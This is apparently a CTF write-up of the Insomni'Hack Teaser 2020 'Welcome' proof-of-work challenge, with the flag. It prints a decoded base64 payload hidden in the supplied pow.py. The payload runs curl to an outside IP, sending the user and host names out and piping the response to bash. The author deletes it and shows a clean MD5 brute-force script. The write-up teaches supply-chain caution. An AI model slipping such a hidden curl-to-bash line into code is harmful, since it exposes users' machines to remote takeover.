# The [url](https://matesz44.github.io/writeups/ctf/insomnihack_2020/welcome/) to my fully working website with the ctf files, etc
# Welcome

> This year we added a Proof of Work to some of our challenges.

> Just run `python pow.py <target>`, were `target` is the value provided by the server and get the flag.

> [pow](https://storage.googleapis.com/insomnihack/media/pow.zip)

> `nc welcome.insomnihack.ch 1337`

# Files we got
- [pow.zip](from_box/pow.zip)
- And if u extract it u got [pow.py](from_box/pow-b39e9d8f81a48ac92097ce060d587ace718c2db8bc9b3906ac640b90a62dc497.py)

# Start
Just run `nc welcome.insomnihack.ch 1337` and we got
```
======================================================================
============ Welcome to the Insomni'Hack Teaser 2020! ============
======================================================================

Give me an input whose md5sum starts with "06b292" and get the flag ;)

```
- It needs an input
- We got the starting of the md5 string but we need to input the cleartext one
Like: the server gives `098f6b` and we have to guess the original string that is `test` now. To check it we can use `echo -n "test" | md5sum` and we got `098f6bcd4621d373cade4e832627b4f6 -`

# Cracking
- We have to crack it somehow so lets take a look at the script we got :D
- It has some weird encoded base64 string in an `exec` function.
Thats weird af. Decrypt it! We got
```
global i;i+=1337;x=os.name;x+="/$(whoami)@$(hostname)|bash"if x!="nt"else"/%USERNAME%@%USERDOMAIN%";os.system("curl -Ns 34.65.187.141/"+x)
```
What can I say except delete this
- Now we have the correct code([pow_corrected.py](pow_corrected.py))

```
#!/usr/bin/python3

import hashlib
import sys

target = sys.argv[1]
i = 0

def pow():
global i, target
while True:
m = hashlib.md5()
m.update(str(i).encode())
h = m.hexdigest()
if h[:6] == target:
print(i)
exit(0)
i += 1

if __name__ == '__main__':
pow()
```

## Getting the flag
- Just connect to nc `nc welcome.insomnihack.ch 1337`
- Copy the string u got `d2295b`
- Run the decryptor `python pow_corrected.py d2295b`
- Send the output `15882830`

# Got it
```
======================================================================
============ Welcome to the Insomni'Hack Teaser 2020! ============
======================================================================

Give me an input whose md5sum starts with "d2295b" and get the flag ;)
15882830

MITM are real: check SHA, check code, ...

INS{Miss me with that fhisy line}
```
The flag is `INS{Miss me with that fhisy line}`